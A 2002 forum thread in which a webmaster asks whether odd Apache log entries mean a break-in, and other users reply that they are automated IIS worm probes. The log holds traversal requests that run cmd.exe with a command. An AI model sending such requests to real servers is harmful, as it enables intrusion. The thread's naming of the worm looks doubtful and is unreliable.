Apache Security Question

I am getting odd access log entrys
My question is are these just scans or have they hacked my webserver?
If they have hacked my server how can i monitor there activities?

Here is part of my log


24.153.55.96 - - [22/Oct/2002:22:33:42 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
24.153.55.96 - - [22/Oct/2002:22:33:43 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
24.153.55.96 - - [22/Oct/2002:22:33:44 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
24.153.55.96 - - [22/Oct/2002:22:33:45 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:46 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:47 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288
24.153.55.96 - - [22/Oct/2002:22:33:48 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
24.153.55.96 - - [22/Oct/2002:22:33:49 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

i had previously suggested to Matt (the above poster) that he install some sort of IDS/Firewall like snort and ZoneAlarm... Is this some kind of skript kiddie attack? just some one snooping around- thanx for any replies...http://www.pivx.com/luigi/adv/AL001/apache_tmp.html

Looking at the timestamps and the targets, yes, this looks like someone trying to find exploits (via a scanner, virus or script). As to the question of being hacked, there isn't enough info here to say either way.

Best advice would be to grab black ice defender or something of the like.

Hope this helps out.

This is Code Red, a worm. You are running Apache, this worm targets IIS, so don't worry everyone gets these hits at least once a day.

Cheers:

/edit

Code Red Info.

You have nothing to worry about. the target of the specific worm/exploit is IIS as it is obvious from the logs (it is a "famous" worm)

I went over something very similar to this ad nauseum here.

/nebulus